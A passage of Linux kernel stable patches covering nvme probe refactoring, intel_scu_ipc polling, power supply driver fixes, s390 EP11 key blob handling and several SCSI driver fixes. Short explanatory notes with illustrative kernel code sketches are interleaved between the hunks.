++	ret = nvme_init_ctrl(&dev->ctrl, &pdev->dev, &nvme_pci_ctrl_ops,
++			     quirks);
++	if (ret)
++		goto out_put_device;
++	return dev;
+ 
+-	/*
+-	 * Double check that our mempool alloc size will cover the biggest
+-	 * command we support.
+-	 */
+-	alloc_size = nvme_pci_iod_alloc_size();
+-	WARN_ON_ONCE(alloc_size > PAGE_SIZE);
++out_put_device:
++	put_device(dev->dev);
++	kfree(dev->queues);
++out_free_dev:
++	kfree(dev);
++	return ERR_PTR(ret);
++}
+ 
+-	dev->iod_mempool = mempool_create_node(1, mempool_kmalloc,
+-						mempool_kfree,
+-						(void *) alloc_size,
+-						GFP_KERNEL, node);
+-	if (!dev->iod_mempool) {
+-		result = -ENOMEM;
+-		goto release_pools;
+-	}
++static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
++{
++	struct nvme_dev *dev;
++	int result = -ENOMEM;
++
++	dev = nvme_pci_alloc_dev(pdev, id);
++	if (IS_ERR(dev))
++		return PTR_ERR(dev);
++
++	result = nvme_dev_map(dev);
++	if (result)
++		goto out_uninit_ctrl;
++
++	result = nvme_setup_prp_pools(dev);
++	if (result)
++		goto out_dev_unmap;
+ 
+-	result = nvme_init_ctrl(&dev->ctrl, &pdev->dev, &nvme_pci_ctrl_ops,
+-			quirks);
++	result = nvme_pci_alloc_iod_mempool(dev);
+ 	if (result)
+-		goto release_mempool;
++		goto out_release_prp_pools;
+ 
+ 	dev_info(dev->ctrl.device, "pci function %s\n", dev_name(&pdev->dev));
++	pci_set_drvdata(pdev, dev);
+ 
+ 	nvme_reset_ctrl(&dev->ctrl);
+ 	async_schedule(nvme_async_probe, dev);
+-
+ 	return 0;
+ 
+- release_mempool:
+-	mempool_destroy(dev->iod_mempool);
+- release_pools:
++out_release_prp_pools:
+ 	nvme_release_prp_pools(dev);
+- unmap:
++out_dev_unmap:
+ 	nvme_dev_unmap(dev);
+- put_pci:
+-	put_device(dev->dev);
+- free:
+-	kfree(dev->queues);
+-	kfree(dev);
++out_uninit_ctrl:
++	nvme_uninit_ctrl(&dev->ctrl);
+ 	return result;
+ }
+ 
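
nvme_pci_alloc_iod_mempool() sizes one allocation to cover the worst-case
PRP/SGL page lists plus the scatterlist, then backs it with a one-element
mempool: normal allocations come from kmalloc, and the single reserved
element guarantees forward progress under memory pressure, which matters on
a block I/O path. The construction in general form (alloc_iod_pool() is an
illustrative name; the mempool helpers are the kernel's):

#include <linux/mempool.h>

/* Sketch: a kmalloc-backed pool with one reserved element. The element
 * size travels through pool_data as a casted pointer, which is the
 * contract of mempool_kmalloc()/mempool_kfree().
 */
static mempool_t *alloc_iod_pool(size_t elem_size, int node)
{
	return mempool_create_node(1 /* reserved elements */,
				   mempool_kmalloc, mempool_kfree,
				   (void *)elem_size, GFP_KERNEL, node);
}
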
+diff --git a/drivers/parisc/iosapic.c b/drivers/parisc/iosapic.c
+index bcc1dae007803..890c3c0f3d140 100644
+--- a/drivers/parisc/iosapic.c
++++ b/drivers/parisc/iosapic.c
+@@ -202,9 +202,9 @@ static inline void iosapic_write(void __iomem *iosapic, unsigned int reg, u32 va
+ 
+ static DEFINE_SPINLOCK(iosapic_lock);
+ 
+-static inline void iosapic_eoi(void __iomem *addr, unsigned int data)
++static inline void iosapic_eoi(__le32 __iomem *addr, __le32 data)
+ {
+-	__raw_writel(data, addr);
++	__raw_writel((__force u32)data, addr);
+ }
+ 
+ /*
+diff --git a/drivers/parisc/iosapic_private.h b/drivers/parisc/iosapic_private.h
+index 73ecc657ad954..bd8ff40162b4b 100644
+--- a/drivers/parisc/iosapic_private.h
++++ b/drivers/parisc/iosapic_private.h
+@@ -118,8 +118,8 @@ struct iosapic_irt {
+ struct vector_info {
+ 	struct iosapic_info *iosapic;	/* I/O SAPIC this vector is on */
+ 	struct irt_entry *irte;		/* IRT entry */
+-	u32 __iomem *eoi_addr;		/* precalculate EOI reg address */
+-	u32	eoi_data;		/* IA64: ?       PA: swapped txn_data */
++	__le32 __iomem *eoi_addr;	/* precalculate EOI reg address */
++	__le32	eoi_data;		/* IA64: ?       PA: swapped txn_data */
+ 	int	txn_irq;		/* virtual IRQ number for processor */
+ 	ulong	txn_addr;		/* IA64: id_eid  PA: partial HPA */
+ 	u32	txn_data;		/* CPU interrupt bit */
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 30b50920b278c..f7dfa0e785fd6 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -60,6 +60,7 @@ config MLXBF_BOOTCTL
+ 	tristate "Mellanox BlueField Firmware Boot Control driver"
+ 	depends on ARM64
+ 	depends on ACPI
++	depends on NET
+ 	help
+ 	  The Mellanox BlueField firmware implements functionality to
+ 	  request swapping the primary and alternate eMMC boot partition,
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index fdf7da06af306..d85d895fee894 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -478,6 +478,15 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
++	{
++		.callback = dmi_matched,
++		.ident = "ASUS ROG FLOW X16",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "GV601V"),
++		},
++		.driver_data = &quirk_asus_tablet_mode,
++	},
+ 	{
+ 		.callback = dmi_matched,
+ 		.ident = "ASUS VivoBook E410MA",
+diff --git a/drivers/platform/x86/intel_scu_ipc.c b/drivers/platform/x86/intel_scu_ipc.c
+index e7a3e34028178..189c5460edd81 100644
+--- a/drivers/platform/x86/intel_scu_ipc.c
++++ b/drivers/platform/x86/intel_scu_ipc.c
+@@ -19,6 +19,7 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+ 
+@@ -232,19 +233,15 @@ static inline u32 ipc_data_readl(struct intel_scu_ipc_dev *scu, u32 offset)
+ /* Wait till the SCU status is no longer busy */
+ static inline int busy_loop(struct intel_scu_ipc_dev *scu)
+ {
+-	unsigned long end = jiffies + IPC_TIMEOUT;
+-
+-	do {
+-		u32 status;
+-
+-		status = ipc_read_status(scu);
+-		if (!(status & IPC_STATUS_BUSY))
+-			return (status & IPC_STATUS_ERR) ? -EIO : 0;
++	u8 status;
++	int err;
+ 
+-		usleep_range(50, 100);
+-	} while (time_before(jiffies, end));
++	err = readx_poll_timeout(ipc_read_status, scu, status, !(status & IPC_STATUS_BUSY),
++				 100, jiffies_to_usecs(IPC_TIMEOUT));
++	if (err)
++		return err;
+ 
+-	return -ETIMEDOUT;
++	return (status & IPC_STATUS_ERR) ? -EIO : 0;
+ }
+ 
+ /* Wait till ipc ioc interrupt is received or timeout in 10 HZ */
+@@ -252,10 +249,12 @@ static inline int ipc_wait_for_interrupt(struct intel_scu_ipc_dev *scu)
+ {
+ 	int status;
+ 
+-	if (!wait_for_completion_timeout(&scu->cmd_complete, IPC_TIMEOUT))
+-		return -ETIMEDOUT;
++	wait_for_completion_timeout(&scu->cmd_complete, IPC_TIMEOUT);
+ 
+ 	status = ipc_read_status(scu);
++	if (status & IPC_STATUS_BUSY)
++		return -ETIMEDOUT;
++
+ 	if (status & IPC_STATUS_ERR)
+ 		return -EIO;
+ 
+@@ -267,6 +266,24 @@ static int intel_scu_ipc_check_status(struct intel_scu_ipc_dev *scu)
+ 	return scu->irq > 0 ? ipc_wait_for_interrupt(scu) : busy_loop(scu);
+ }
+ 
++static struct intel_scu_ipc_dev *intel_scu_ipc_get(struct intel_scu_ipc_dev *scu)
++{
++	u8 status;
++
++	if (!scu)
++		scu = ipcdev;
++	if (!scu)
++		return ERR_PTR(-ENODEV);
++
++	status = ipc_read_status(scu);
++	if (status & IPC_STATUS_BUSY) {
++		dev_dbg(&scu->dev, "device is busy\n");
++		return ERR_PTR(-EBUSY);
++	}
++
++	return scu;
++}
++
+ /* Read/Write power control(PMIC in Langwell, MSIC in PenWell) registers */
+ static int pwr_reg_rdwr(struct intel_scu_ipc_dev *scu, u16 *addr, u8 *data,
+ 			u32 count, u32 op, u32 id)
+@@ -280,11 +297,10 @@ static int pwr_reg_rdwr(struct intel_scu_ipc_dev *scu, u16 *addr, u8 *data,
+ 	memset(cbuf, 0, sizeof(cbuf));
+ 
+ 	mutex_lock(&ipclock);
+-	if (!scu)
+-		scu = ipcdev;
+-	if (!scu) {
++	scu = intel_scu_ipc_get(scu);
++	if (IS_ERR(scu)) {
+ 		mutex_unlock(&ipclock);
+-		return -ENODEV;
++		return PTR_ERR(scu);
+ 	}
+ 
+ 	for (nc = 0; nc < count; nc++, offset += 2) {
+@@ -439,13 +455,12 @@ int intel_scu_ipc_dev_simple_command(struct intel_scu_ipc_dev *scu, int cmd,
+ 	int err;
+ 
+ 	mutex_lock(&ipclock);
+-	if (!scu)
+-		scu = ipcdev;
+-	if (!scu) {
++	scu = intel_scu_ipc_get(scu);
++	if (IS_ERR(scu)) {
+ 		mutex_unlock(&ipclock);
+-		return -ENODEV;
++		return PTR_ERR(scu);
+ 	}
+-	scu = ipcdev;
++
+ 	cmdval = sub << 12 | cmd;
+ 	ipc_command(scu, cmdval);
+ 	err = intel_scu_ipc_check_status(scu);
+@@ -485,11 +500,10 @@ int intel_scu_ipc_dev_command_with_size(struct intel_scu_ipc_dev *scu, int cmd,
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&ipclock);
+-	if (!scu)
+-		scu = ipcdev;
+-	if (!scu) {
++	scu = intel_scu_ipc_get(scu);
++	if (IS_ERR(scu)) {
+ 		mutex_unlock(&ipclock);
+-		return -ENODEV;
++		return PTR_ERR(scu);
+ 	}
+ 
+ 	memcpy(inbuf, in, inlen);
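
The busy_loop() rewrite above swaps an open-coded jiffies loop for
readx_poll_timeout(), which keeps evaluating ipc_read_status(scu) into
status, sleeps about 100 us between reads, and returns -ETIMEDOUT by itself
once the budget is spent; only the final status decoding is left to the
caller. The general shape of the helper (my_read_status(), MY_BUSY and the
1-second timeout are stand-ins):

#include <linux/bits.h>
#include <linux/iopoll.h>

struct my_dev;				/* stand-in device type */
u8 my_read_status(struct my_dev *dev);	/* stand-in accessor */
#define MY_BUSY	BIT(0)			/* stand-in busy bit */

static int wait_not_busy(struct my_dev *dev)
{
	u8 status;

	/* args: op, op argument, result, break condition,
	 * sleep between reads (us), total timeout (us)
	 */
	return readx_poll_timeout(my_read_status, dev, status,
				  !(status & MY_BUSY), 100, 1000000);
}
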
+diff --git a/drivers/power/supply/ab8500_btemp.c b/drivers/power/supply/ab8500_btemp.c
+index 6f83e99d2eb72..ce36d6ca34226 100644
+--- a/drivers/power/supply/ab8500_btemp.c
++++ b/drivers/power/supply/ab8500_btemp.c
+@@ -115,7 +115,6 @@ struct ab8500_btemp {
+ static enum power_supply_property ab8500_btemp_props[] = {
+ 	POWER_SUPPLY_PROP_PRESENT,
+ 	POWER_SUPPLY_PROP_ONLINE,
+-	POWER_SUPPLY_PROP_TECHNOLOGY,
+ 	POWER_SUPPLY_PROP_TEMP,
+ };
+ 
+@@ -532,12 +531,6 @@ static int ab8500_btemp_get_property(struct power_supply *psy,
+ 		else
+ 			val->intval = 1;
+ 		break;
+-	case POWER_SUPPLY_PROP_TECHNOLOGY:
+-		if (di->bm->bi)
+-			val->intval = di->bm->bi->technology;
+-		else
+-			val->intval = POWER_SUPPLY_TECHNOLOGY_UNKNOWN;
+-		break;
+ 	case POWER_SUPPLY_PROP_TEMP:
+ 		val->intval = ab8500_btemp_get_temp(di);
+ 		break;
+@@ -662,7 +655,7 @@ static char *supply_interface[] = {
+ 
+ static const struct power_supply_desc ab8500_btemp_desc = {
+ 	.name			= "ab8500_btemp",
+-	.type			= POWER_SUPPLY_TYPE_BATTERY,
++	.type			= POWER_SUPPLY_TYPE_UNKNOWN,
+ 	.properties		= ab8500_btemp_props,
+ 	.num_properties		= ARRAY_SIZE(ab8500_btemp_props),
+ 	.get_property		= ab8500_btemp_get_property,
+diff --git a/drivers/power/supply/ab8500_chargalg.c b/drivers/power/supply/ab8500_chargalg.c
+index ea4ad61d4c7e2..2205ea0834a61 100644
+--- a/drivers/power/supply/ab8500_chargalg.c
++++ b/drivers/power/supply/ab8500_chargalg.c
+@@ -1720,7 +1720,7 @@ static char *supply_interface[] = {
+ 
+ static const struct power_supply_desc ab8500_chargalg_desc = {
+ 	.name			= "ab8500_chargalg",
+-	.type			= POWER_SUPPLY_TYPE_BATTERY,
++	.type			= POWER_SUPPLY_TYPE_UNKNOWN,
+ 	.properties		= ab8500_chargalg_props,
+ 	.num_properties		= ARRAY_SIZE(ab8500_chargalg_props),
+ 	.get_property		= ab8500_chargalg_get_property,
+diff --git a/drivers/power/supply/mt6370-charger.c b/drivers/power/supply/mt6370-charger.c
+index f27dae5043f5b..a9641bd3d8cf8 100644
+--- a/drivers/power/supply/mt6370-charger.c
++++ b/drivers/power/supply/mt6370-charger.c
+@@ -324,7 +324,7 @@ static int mt6370_chg_toggle_cfo(struct mt6370_priv *priv)
+ 
+ 	if (fl_strobe) {
+ 		dev_err(priv->dev, "Flash led is still in strobe mode\n");
+-		return ret;
++		return -EINVAL;
+ 	}
+ 
+ 	/* cfo off */
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index f1b431aa0e4f2..c04b96edcf595 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -1058,6 +1058,13 @@ static void rk817_charging_monitor(struct work_struct *work)
+ 	queue_delayed_work(system_wq, &charger->work, msecs_to_jiffies(8000));
+ }
+ 
++static void rk817_cleanup_node(void *data)
++{
++	struct device_node *node = data;
++
++	of_node_put(node);
++}
++
+ static int rk817_charger_probe(struct platform_device *pdev)
+ {
+ 	struct rk808 *rk808 = dev_get_drvdata(pdev->dev.parent);
+@@ -1074,11 +1081,13 @@ static int rk817_charger_probe(struct platform_device *pdev)
+ 	if (!node)
+ 		return -ENODEV;
+ 
++	ret = devm_add_action_or_reset(&pdev->dev, rk817_cleanup_node, node);
++	if (ret)
++		return ret;
++
+ 	charger = devm_kzalloc(&pdev->dev, sizeof(*charger), GFP_KERNEL);
+-	if (!charger) {
+-		of_node_put(node);
++	if (!charger)
+ 		return -ENOMEM;
+-	}
+ 
+ 	charger->rk808 = rk808;
+ 
+@@ -1224,3 +1233,4 @@ MODULE_DESCRIPTION("Battery power supply driver for RK817 PMIC");
+ MODULE_AUTHOR("Maya Matuszczyk <maccraft123mc@gmail.com>");
+ MODULE_AUTHOR("Chris Morgan <macromorgan@hotmail.com>");
+ MODULE_LICENSE("GPL");
++MODULE_ALIAS("platform:rk817-charger");
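
The rk817 probe fix hands the of_node reference to devm: of_node_put() runs
automatically on every later error return and on driver detach, and
devm_add_action_or_reset() invokes the action immediately if the registration
itself fails, so no path leaks the node. The idiom in isolation (the
"charger" child name and function names are illustrative):

#include <linux/device.h>
#include <linux/of.h>

static void put_node_action(void *data)
{
	of_node_put(data);		/* data is the struct device_node * */
}

/* Sketch: tie an of_node reference to the device's lifetime. */
static int grab_child_node(struct device *dev, struct device_node **out)
{
	struct device_node *node;
	int ret;

	node = of_get_child_by_name(dev->of_node, "charger");
	if (!node)
		return -ENODEV;

	ret = devm_add_action_or_reset(dev, put_node_action, node);
	if (ret)
		return ret;	/* the action already ran: node was put */

	*out = node;
	return 0;
}
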
+diff --git a/drivers/power/supply/ucs1002_power.c b/drivers/power/supply/ucs1002_power.c
+index ef673ec3db568..332cb50d9fb4f 100644
+--- a/drivers/power/supply/ucs1002_power.c
++++ b/drivers/power/supply/ucs1002_power.c
+@@ -384,7 +384,8 @@ static int ucs1002_get_property(struct power_supply *psy,
+ 	case POWER_SUPPLY_PROP_USB_TYPE:
+ 		return ucs1002_get_usb_type(info, val);
+ 	case POWER_SUPPLY_PROP_HEALTH:
+-		return val->intval = info->health;
++		val->intval = info->health;
++		return 0;
+ 	case POWER_SUPPLY_PROP_PRESENT:
+ 		val->intval = info->present;
+ 		return 0;
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index 2b92ec20ed68e..df0f19e6d9235 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -212,7 +212,8 @@ static int pkey_clr2ep11key(const u8 *clrkey, size_t clrkeylen,
+ 		card = apqns[i] >> 16;
+ 		dom = apqns[i] & 0xFFFF;
+ 		rc = ep11_clr2keyblob(card, dom, clrkeylen * 8,
+-				      0, clrkey, keybuf, keybuflen);
++				      0, clrkey, keybuf, keybuflen,
++				      PKEY_TYPE_EP11);
+ 		if (rc == 0)
+ 			break;
+ 	}
+@@ -627,6 +628,11 @@ static int pkey_clr2seckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 		if (*keybufsize < MINEP11AESKEYBLOBSIZE)
+ 			return -EINVAL;
+ 		break;
++	case PKEY_TYPE_EP11_AES:
++		if (*keybufsize < (sizeof(struct ep11kblob_header) +
++				   MINEP11AESKEYBLOBSIZE))
++			return -EINVAL;
++		break;
+ 	default:
+ 		return -EINVAL;
+ 	}
+@@ -645,9 +651,11 @@ static int pkey_clr2seckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 	for (i = 0, rc = -ENODEV; i < nr_apqns; i++) {
+ 		card = apqns[i].card;
+ 		dom = apqns[i].domain;
+-		if (ktype == PKEY_TYPE_EP11) {
++		if (ktype == PKEY_TYPE_EP11 ||
++		    ktype == PKEY_TYPE_EP11_AES) {
+ 			rc = ep11_clr2keyblob(card, dom, ksize, kflags,
+-					      clrkey, keybuf, keybufsize);
++					      clrkey, keybuf, keybufsize,
++					      ktype);
+ 		} else if (ktype == PKEY_TYPE_CCA_DATA) {
+ 			rc = cca_clr2seckey(card, dom, ksize,
+ 					    clrkey, keybuf);
+@@ -1361,7 +1369,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		apqns = _copy_apqns_from_user(kcs.apqns, kcs.apqn_entries);
+ 		if (IS_ERR(apqns))
+ 			return PTR_ERR(apqns);
+-		kkey = kmalloc(klen, GFP_KERNEL);
++		kkey = kzalloc(klen, GFP_KERNEL);
+ 		if (!kkey) {
+ 			kfree(apqns);
+ 			return -ENOMEM;
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.c b/drivers/s390/crypto/zcrypt_ep11misc.c
+index 20bbeec1a1a22..77e1ffaafaea1 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.c
++++ b/drivers/s390/crypto/zcrypt_ep11misc.c
+@@ -1000,12 +1000,12 @@ out:
+ 	return rc;
+ }
+ 
+-static int ep11_unwrapkey(u16 card, u16 domain,
+-			  const u8 *kek, size_t keksize,
+-			  const u8 *enckey, size_t enckeysize,
+-			  u32 mech, const u8 *iv,
+-			  u32 keybitsize, u32 keygenflags,
+-			  u8 *keybuf, size_t *keybufsize)
++static int _ep11_unwrapkey(u16 card, u16 domain,
++			   const u8 *kek, size_t keksize,
++			   const u8 *enckey, size_t enckeysize,
++			   u32 mech, const u8 *iv,
++			   u32 keybitsize, u32 keygenflags,
++			   u8 *keybuf, size_t *keybufsize)
+ {
+ 	struct uw_req_pl {
+ 		struct pl_head head;
+@@ -1042,7 +1042,6 @@ static int ep11_unwrapkey(u16 card, u16 domain,
+ 	struct ep11_cprb *req = NULL, *rep = NULL;
+ 	struct ep11_target_dev target;
+ 	struct ep11_urb *urb = NULL;
+-	struct ep11keyblob *kb;
+ 	size_t req_pl_size;
+ 	int api, rc = -ENOMEM;
+ 	u8 *p;
+@@ -1124,14 +1123,9 @@ static int ep11_unwrapkey(u16 card, u16 domain,
+ 		goto out;
+ 	}
+ 
+-	/* copy key blob and set header values */
++	/* copy key blob */
+ 	memcpy(keybuf, rep_pl->data, rep_pl->data_len);
+ 	*keybufsize = rep_pl->data_len;
+-	kb = (struct ep11keyblob *)keybuf;
+-	kb->head.type = TOKTYPE_NON_CCA;
+-	kb->head.len = rep_pl->data_len;
+-	kb->head.version = TOKVER_EP11_AES;
+-	kb->head.bitlen = keybitsize;
+ 
+ out:
+ 	kfree(req);
+@@ -1140,6 +1134,42 @@ out:
+ 	return rc;
+ }
+ 
++static int ep11_unwrapkey(u16 card, u16 domain,
++			  const u8 *kek, size_t keksize,
++			  const u8 *enckey, size_t enckeysize,
++			  u32 mech, const u8 *iv,
++			  u32 keybitsize, u32 keygenflags,
++			  u8 *keybuf, size_t *keybufsize,
++			  u8 keybufver)
++{
++	struct ep11kblob_header *hdr;
++	size_t hdr_size, pl_size;
++	u8 *pl;
++	int rc;
++
++	rc = ep11_kb_split(keybuf, *keybufsize, keybufver,
++			   &hdr, &hdr_size, &pl, &pl_size);
++	if (rc)
++		return rc;
++
++	rc = _ep11_unwrapkey(card, domain, kek, keksize, enckey, enckeysize,
++			     mech, iv, keybitsize, keygenflags,
++			     pl, &pl_size);
++	if (rc)
++		return rc;
++
++	*keybufsize = hdr_size + pl_size;
++
++	/* update header information */
++	hdr = (struct ep11kblob_header *)keybuf;
++	hdr->type = TOKTYPE_NON_CCA;
++	hdr->len = *keybufsize;
++	hdr->version = keybufver;
++	hdr->bitlen = keybitsize;
++
++	return 0;
++}
++
+ static int ep11_wrapkey(u16 card, u16 domain,
+ 			const u8 *key, size_t keysize,
+ 			u32 mech, const u8 *iv,
+@@ -1274,7 +1304,8 @@ out:
+ }
+ 
+ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+-		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize)
++		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize,
++		     u32 keytype)
+ {
+ 	int rc;
+ 	u8 encbuf[64], *kek = NULL;
+@@ -1321,7 +1352,7 @@ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 	/* Step 3: import the encrypted key value as a new key */
+ 	rc = ep11_unwrapkey(card, domain, kek, keklen,
+ 			    encbuf, encbuflen, 0, def_iv,
+-			    keybitsize, 0, keybuf, keybufsize);
++			    keybitsize, 0, keybuf, keybufsize, keytype);
+ 	if (rc) {
+ 		DEBUG_ERR(
+ 			"%s importing key value as new key failed, rc=%d\n",
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.h b/drivers/s390/crypto/zcrypt_ep11misc.h
+index ed328c354bade..b7f9cbe3d58de 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.h
++++ b/drivers/s390/crypto/zcrypt_ep11misc.h
+@@ -113,7 +113,8 @@ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+  * Generate EP11 AES secure key with given clear key value.
+  */
+ int ep11_clr2keyblob(u16 cardnr, u16 domain, u32 keybitsize, u32 keygenflags,
+-		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize);
++		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize,
++		     u32 keytype);
+ 
+ /*
+ * Build a list of ep11 apqns meeting the following constraints:
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index 8009eab3b7bee..56ade46309707 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -724,6 +724,10 @@ iscsi_sw_tcp_conn_bind(struct iscsi_cls_session *cls_session,
+ 		return -EEXIST;
+ 	}
+ 
++	err = -EINVAL;
++	if (!sk_is_tcp(sock->sk))
++		goto free_socket;
++
+ 	err = iscsi_conn_bind(cls_session, cls_conn, is_leading);
+ 	if (err)
+ 		goto free_socket;
+diff --git a/drivers/scsi/pm8001/pm8001_hwi.c b/drivers/scsi/pm8001/pm8001_hwi.c
+index 628b08ba6770b..e2c52c2d00b33 100644
+--- a/drivers/scsi/pm8001/pm8001_hwi.c
++++ b/drivers/scsi/pm8001/pm8001_hwi.c
+@@ -4313,7 +4313,7 @@ pm8001_chip_phy_start_req(struct pm8001_hba_info *pm8001_ha, u8 phy_id)
+ 	payload.sas_identify.dev_type = SAS_END_DEVICE;
+ 	payload.sas_identify.initiator_bits = SAS_PROTOCOL_ALL;
+ 	memcpy(payload.sas_identify.sas_addr,
+-		pm8001_ha->sas_addr, SAS_ADDR_SIZE);
++		&pm8001_ha->phy[phy_id].dev_sas_addr, SAS_ADDR_SIZE);
+ 	payload.sas_identify.phy_id = phy_id;
+ 
+ 	return pm8001_mpi_build_cmd(pm8001_ha, 0, opcode, &payload,
+diff --git a/drivers/scsi/pm8001/pm80xx_hwi.c b/drivers/scsi/pm8001/pm80xx_hwi.c
+index f8b8624458f73..2bf293e8f7472 100644
+--- a/drivers/scsi/pm8001/pm80xx_hwi.c
++++ b/drivers/scsi/pm8001/pm80xx_hwi.c
+@@ -3750,10 +3750,12 @@ static int mpi_set_controller_config_resp(struct pm8001_hba_info *pm8001_ha,
+ 			(struct set_ctrl_cfg_resp *)(piomb + 4);
+ 	u32 status = le32_to_cpu(pPayload->status);
+ 	u32 err_qlfr_pgcd = le32_to_cpu(pPayload->err_qlfr_pgcd);
++	u32 tag = le32_to_cpu(pPayload->tag);
+ 
+ 	pm8001_dbg(pm8001_ha, MSG,
+ 		   "SET CONTROLLER RESP: status 0x%x qlfr_pgcd 0x%x\n",
+ 		   status, err_qlfr_pgcd);
++	pm8001_tag_free(pm8001_ha, tag);
+ 
+ 	return 0;
+ }
+@@ -4803,7 +4805,7 @@ pm80xx_chip_phy_start_req(struct pm8001_hba_info *pm8001_ha, u8 phy_id)
+ 	payload.sas_identify.dev_type = SAS_END_DEVICE;
+ 	payload.sas_identify.initiator_bits = SAS_PROTOCOL_ALL;
+ 	memcpy(payload.sas_identify.sas_addr,
+-	  &pm8001_ha->sas_addr, SAS_ADDR_SIZE);
++		&pm8001_ha->phy[phy_id].dev_sas_addr, SAS_ADDR_SIZE);
+ 	payload.sas_identify.phy_id = phy_id;
+ 
+ 	return pm8001_mpi_build_cmd(pm8001_ha, 0, opcode, &payload,
+diff --git a/drivers/scsi/qedf/qedf_io.c b/drivers/scsi/qedf/qedf_io.c
+index 4750ec5789a80..10fe3383855c0 100644
+--- a/drivers/scsi/qedf/qedf_io.c
++++ b/drivers/scsi/qedf/qedf_io.c
+@@ -1904,6 +1904,7 @@ int qedf_initiate_abts(struct qedf_ioreq *io_req, bool return_scsi_cmd_on_abts)
+ 		goto drop_rdata_kref;
+ 	}
+ 
++	spin_lock_irqsave(&fcport->rport_lock, flags);
+ 	if (!test_bit(QEDF_CMD_OUTSTANDING, &io_req->flags) ||
+ 	    test_bit(QEDF_CMD_IN_CLEANUP, &io_req->flags) ||
+ 	    test_bit(QEDF_CMD_IN_ABORT, &io_req->flags)) {
+@@ -1911,17 +1912,20 @@ int qedf_initiate_abts(struct qedf_ioreq *io_req, bool return_scsi_cmd_on_abts)
+ 			 "io_req xid=0x%x sc_cmd=%p already in cleanup or abort processing or already completed.\n",
+ 			 io_req->xid, io_req->sc_cmd);
+ 		rc = 1;
++		spin_unlock_irqrestore(&fcport->rport_lock, flags);
+ 		goto drop_rdata_kref;
+ 	}
+ 
++	/* Set the command type to abort */
++	io_req->cmd_type = QEDF_ABTS;
++	spin_unlock_irqrestore(&fcport->rport_lock, flags);
++
+ 	kref_get(&io_req->refcount);
+ 
+ 	xid = io_req->xid;
+ 	qedf->control_requests++;
+ 	qedf->packet_aborts++;
+ 
+-	/* Set the command type to abort */
+-	io_req->cmd_type = QEDF_ABTS;
+ 	io_req->return_scsi_cmd_on_abts = return_scsi_cmd_on_abts;
+ 
+ 	set_bit(QEDF_CMD_IN_ABORT, &io_req->flags);
+@@ -2210,7 +2214,9 @@ process_els:
+ 		  refcount, fcport, fcport->rdata->ids.port_id);
+ 
+ 	/* Cleanup cmds re-use the same TID as the original I/O */
++	spin_lock_irqsave(&fcport->rport_lock, flags);
+ 	io_req->cmd_type = QEDF_CLEANUP;
++	spin_unlock_irqrestore(&fcport->rport_lock, flags);
+ 	io_req->return_scsi_cmd_on_abts = return_scsi_cmd_on_abts;
+ 
+ 	init_completion(&io_req->cleanup_done);
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index c4f293d39f228..d969b0dc97326 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -2807,6 +2807,8 @@ void qedf_process_cqe(struct qedf_ctx *qedf, struct fcoe_cqe *cqe)
+ 	struct qedf_ioreq *io_req;
+ 	struct qedf_rport *fcport;
+ 	u32 comp_type;
++	u8 io_comp_type;
++	unsigned long flags;
+ 
+ 	comp_type = (cqe->cqe_data >> FCOE_CQE_CQE_TYPE_SHIFT) &
+ 	    FCOE_CQE_CQE_TYPE_MASK;
+@@ -2840,11 +2842,14 @@ void qedf_process_cqe(struct qedf_ctx *qedf, struct fcoe_cqe *cqe)
+ 		return;
+ 	}
+ 
++	spin_lock_irqsave(&fcport->rport_lock, flags);
++	io_comp_type = io_req->cmd_type;
++	spin_unlock_irqrestore(&fcport->rport_lock, flags);
+ 
+ 	switch (comp_type) {
+ 	case FCOE_GOOD_COMPLETION_CQE_TYPE:
+ 		atomic_inc(&fcport->free_sqes);
+-		switch (io_req->cmd_type) {
++		switch (io_comp_type) {
+ 		case QEDF_SCSI_CMD:
+ 			qedf_scsi_completion(qedf, cqe, io_req);
+ 			break;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 7d282906598f3..1713588f671f3 100644
